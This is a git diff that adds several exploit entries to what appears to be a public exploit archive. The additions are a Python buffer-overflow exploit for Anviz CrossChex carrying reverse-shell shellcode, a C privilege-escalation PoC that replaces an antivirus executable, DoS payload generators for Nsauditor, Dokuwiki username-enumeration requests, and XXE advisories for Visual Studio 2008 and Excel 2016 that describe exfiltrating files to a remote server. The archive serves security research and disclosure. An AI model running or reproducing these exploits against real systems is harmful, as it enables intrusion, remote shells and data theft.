diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt
new file mode 100644
index 000000000..bcd16c8d8
--- /dev/null
+++ b/exploits/php/webapps/47730.txt
@@ -0,0 +1,123 @@
+# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
+# Discovery by: LiquidWorm
+# Date: 2019-12-02
+# Vendor Homepage: http://www.gavazzi-automation.com
+# Tested Version: 6.5.33.17072501
+# CVE: N/A
+# Advisory ID: ZSL-2019-5543
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
+
+
+Vendor: Carlo Gavazzi Automation S.p.A
+Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
+Affected version: Web-app: 6.5.33.17072501
+ Web-app: 6.5.32.17062101
+ Web-app: 6.2.3.16102701
+ Web-app: 5.5.3.160421101
+ Web-app: 5.3.3.15120101
+ Release: 1.0.5.1
+ Release: 1.0.5.0
+ Release: 1.0.3.5
+ Release: 1.0.3.2
+
+Summary: Carlo Gavazzi is an international company that develops, manufactures
+and sells electrical automation components. Our products are used in industrial
+automation and real estate automation. Smart-house is based on a system that we
+have developed and produced since 1986, mainly for industrial-related installations.
+Our system is present in more than 150,000 installations. For a few years now, we
+have focused our development on smart electrical installations for home and property
+automation. Smart-house is currently installed in both villas and commercial properties.
+
+Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
+allows users to perform certain actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site. Input passed
+to several GET/POST parameters is not properly sanitised before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a user's browser session
+in context of an affected site.
+
+Tested on: Apache
+ PHP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5543
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+
+01.11.2019
+
+--
+
+
+Reflected XSS (GET):
+--------------------
+
+1. http://192.168.0.24/app/index.php?error=Waddup"> (pre-auth)
+2. http://192.168.0.24/app/messagepage.php?msg= (pre-auth)
+3. http://192.168.0.24/app/detaf.php?p=0&l=50">&f=5658 (post-auth)
+4. http://192.168.0.24/app/detaf.php?p=0">&l=50&f=5658 (post-auth)
+5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction">&grpl=1 (post-auth)
+
+
+CSRF set temperature:
+---------------------
+
+
+
+
+
+
+
+
+Stored XSS (POST):
+------------------
+
+
+
+
+
+
+
+
+Reflected XSS (POST):
+---------------------
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/47731.txt b/exploits/php/webapps/47731.txt
new file mode 100644
index 000000000..e78a79dc7
--- /dev/null
+++ b/exploits/php/webapps/47731.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
+# Date: 2019-12-01
+# Exploit Author: Talha ŞEN
+# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
+# Software Link: https://download.dokuwiki.org/
+# Version: 2018-04-22b "Greebo"
+# Tested on:
+# Alpine Linux 3.5 (docker image)
+# PHP 5.6.30
+# Apache/2.4.25 (Unix)
+# CVE :
+
+# At login page there is a "set new password" page as below:
+# Forgotten your password? Get a new one: Set new password
+# At this page there is username enumeration vulnerability.
+# Testing for non-valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=sss
+
+# Response for non-valid user(sss):
+
+Sorry, we can't find this user in our database.
+
+========================================================================
+
+# Testing for valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=admin
+
+# Response for valid user (admin):
+
+There was an unexpected problem communicating with SMTP: Could not open SMTP Port.
+Looks like there was an error on sending the password mail. Please contact the admin!
\ No newline at end of file
diff --git a/exploits/windows/dos/47728.py b/exploits/windows/dos/47728.py
new file mode 100755
index 000000000..0f3f7639e
--- /dev/null
+++ b/exploits/windows/dos/47728.py
@@ -0,0 +1,35 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
+# software significantly reduces the total cost of network management in enterprise environments by enabling
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+# PoC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 1000
+try:
+ f=open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47732.py b/exploits/windows/dos/47732.py
new file mode 100755
index 000000000..2c52b2d2e
--- /dev/null
+++ b/exploits/windows/dos/47732.py
@@ -0,0 +1,37 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+# Email : blackwolf@post.com
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
+# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise
+# network for all potential methods that a hacker might use to attack it and create a report of potential
+# problems that were found , Nsauditor network auditing software significantly reduces the total cost of
+# network management in enterprise environments by enabling IT personnel and systems administrators gather
+# a wide range of information from all the computers in the network without installing server-side applications
+# on these computers and create a report of potential problems that were found.
+
+# POC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1000
+try:
+ f=open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47733.txt b/exploits/windows/local/47733.txt
new file mode 100644
index 000000000..2c4ac32b5
--- /dev/null
+++ b/exploits/windows/local/47733.txt
@@ -0,0 +1,133 @@
+# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.maxpcsecure.com
+# Tested Version: 19.0.4.020
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.maxpcsecure.com
+
+
+[Affected Product Code Base]
+Max Secure Anti Virus Plus - 19.0.4.020
+
+File hash: ab1dda23ad3955eb18fdb75f3cbc308a
+msplusx64.exe
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
+Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
+
+C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
+C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
+ BUILTIN\Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Exploit/POC]
+#include
+#include
+#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
+#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
+#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
+
+/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
+
+BOOL PWNED=FALSE;
+
+BOOL FileExists(LPCTSTR szPath){
+ DWORD dwAttrib = GetFileAttributes(szPath);
+ return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
+}
+
+void main(void){
+
+ if(!FileExists(DISABLED_TARGET)){
+ CopyFile(TARGET, TMP, FALSE);
+ Sleep(1000);
+ CopyFile(TMP, DISABLED_TARGET, FALSE);
+ printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
+ Sleep(1000);
+ printf("[+] Disabled MaxSDUI.exe ...\n");
+ Sleep(300);
+ }else{
+ PWNED=TRUE;
+ }
+
+ if(!PWNED){
+ char fname[MAX_PATH];
+ char newLoc[]=TARGET;
+ DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
+ if (size){
+ printf("[+] Copying exploit to vuln dir...\n");
+ Sleep(1000);
+ CopyFile(fname, TARGET, FALSE);
+ printf("[+] Replaced legit Max Secure EXE...\n");
+ Sleep(2000);
+ printf("[+] Done!\n");
+ MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
+ Sleep(1000);
+ exit(0);
+ }
+ }else{
+ if(FileExists(TMP)){
+ remove(TMP);
+ }
+ printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
+ printf("[+] hyp3rlinx\n");
+ system("pause");
+ }
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=DXSV5geXkTw
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: November 19, 2019
+Vendor: "received a reply they will fix soon"
+Status request: November 24, 2019
+No replies other than automated response.
+November 29, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47734.py b/exploits/windows/local/47734.py
new file mode 100755
index 000000000..c29323419
--- /dev/null
+++ b/exploits/windows/local/47734.py
@@ -0,0 +1,125 @@
+# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
+# Date: 2019-11-30
+# Exploit Author: Luis Catarino & Pedro Rodrigues
+# Vendor Homepage: https://www.anviz.com/
+# Software Link: https://www.anviz.com/download.html
+# Version: Crosschex Standard x86 <= V4.3.12
+# Tested on: 4.3.8.0, 4.3.12
+# CVE : N/A
+# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
+
+import socket
+import time
+import sys
+import binascii
+
+# Scapy for the broadcast packet with custom sport
+from scapy.all import Raw,IP,Dot1Q,UDP,Ether
+import scapy.all
+
+# shellcode working calc.exe
+calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
+calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
+calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
+calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
+calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
+
+# shellcode windows x86 reverse_shell
+shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
+shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
+shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
+shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
+shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
+
+# shellcode windows x86 reverse_shell (part_2)
+shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
+shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
+shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
+shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
+shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
+shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
+shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
+shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
+shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
+shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+
+def ipToShellcode(ip):
+ a = ip.split('.')
+ b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
+ b = b.replace("0x","")
+ return binascii.unhexlify(b)
+
+# sport has to be 5060
+def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
+ request = b"A"*77 # Original payload substitute
+ request += b"B"*184
+ request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
+ request += b"A"*4
+ # 269 bytes
+
+ if len(sys.argv) > 2:
+ request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
+ else:
+ request = request + calculator_payload
+
+ scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
+
+def setFuzzUDPServer(ip='', port=5050, timeout=150):
+ try :
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ except:
+ print('[!] Failed to create server socket')
+
+ try:
+ s.bind(('', port))
+ except:
+ print('[*] Server socket bind failed')
+ sys.exit()
+
+ print('[*] Waiting for crosschex')
+ s.settimeout(timeout)
+ timeout = time.time() + timeout
+ responses = []
+
+ while True:
+ if time.time() > timeout:
+ break
+ try:
+ response = s.recvfrom(1024)
+ print(response)
+ responses.append(response)
+ sendFuzzingUDPBroadcast(ip=ip)
+ response = s.recvfrom(1024)
+ except socket.timeout:
+ print("[!] Error with UDP server")
+
+ s.close()
+ return responses
+
+nargs = len(sys.argv)
+
+if nargs < 2:
+ print("[*] Usage: python3 %s []\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
+ sys.exit(0)
+
+setFuzzUDPServer()
\ No newline at end of file
diff --git a/exploits/xml/local/47729.txt b/exploits/xml/local/47729.txt
new file mode 100644
index 000000000..3b18accf6
--- /dev/null
+++ b/exploits/xml/local/47729.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Visual Studio 2008 - XML External Entity Injection
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.microsoft.com
+# Software Link: Visual Studio 2008 Express IDE
+# Tested Version: 2008
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Visual Studio 2008 Express IDE
+vcsetup.exe
+File hash: 62f764849e8fcdf8bfbc342685641304
+Download: http://go.microsoft.com/?linkid=7729279
+
+
+[Vulnerability Type]
+XML External Entity Injection 0Day
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
+By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
+remote attackers server.
+
+Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get
+associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.
+
+[Vuln XXE file types]
+.snippet
+.i
+.s
+.asm
+.disco
+.lst
+.inc
+.srf
+.wsdl
+.rgs
+.xml
+
+This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.
+
+
+[References]
+https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/
+
+
+[Exploit/POC]
+"Evil.snippet" or any of the extensions mentioned above.
+
+
+
+
+%dtd;]>
+&send;
+
+
+"payload.dtd"
+
+
+">
+%all;
+
+
+python -m SimpleHTTPServer
+python -m http.server (Python3)
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=QOZlwzsbPrk
+
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: 3/24/2017
+MSRC sent me link to "Definition of a Security Vulnerability"
+Also Product is also not supported anymore.
+December 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/xml/local/47735.txt b/exploits/xml/local/47735.txt
new file mode 100644
index 000000000..422886185
--- /dev/null
+++ b/exploits/xml/local/47735.txt
@@ -0,0 +1,107 @@
+# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.microsoft.com
+# Tested Version: 2016 v1901
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Excel 2016 v1901
+
+Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
+It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.
+
+
+[CVE]
+N/A
+
+
+[Vulnerability Type]
+Error Import Based XML External Entity Injection
+
+
+[Security Issue]
+Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as
+Html page" functionality upon receiving errors importing a specially crafted XML file.
+
+This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability.
+
+Tested successfuly Windows 10 .NET framework version v4.0.30319.
+
+C:\>dir /b %windir%\Microsoft.NET\Framework\v*
+v4.0.30319
+
+
+[Exploit/POC]
+Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML'
+
+1) You will get error like:
+
+"Error:
+
+Unable to connect
+
+We encountered an error while trying to connect.
+
+The user will then get an option to 'Edit' where they can import the file as an HTML file
+
+Result Local data can be exfiltrated to remote server"
+
+2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel
+
+User has choose to import as HTML then XXE attack will succeed:
+
+e.g.
+
+127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
+/1.1" 200 -
+
+
+Malicious XML file to load as New Data Query
+
+"test.xml"
+
+
+
+
+%dtd;]>
+&send;
+
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: May 10, 2019
+MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release.
+Engineering Team may or may not fix in a future version of the release."
+November 30, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index abb7ab111..f0d1b99a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6614,6 +6614,8 @@ id,file,description,date,author,type,platform,port
47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
+47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
+47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10817,6 +10819,10 @@ id,file,description,date,author,type,platform,port
47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 - SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
+47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
+47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
+47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
+47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42039,3 +42045,5 @@ id,file,description,date,author,type,platform,port
47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
+47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,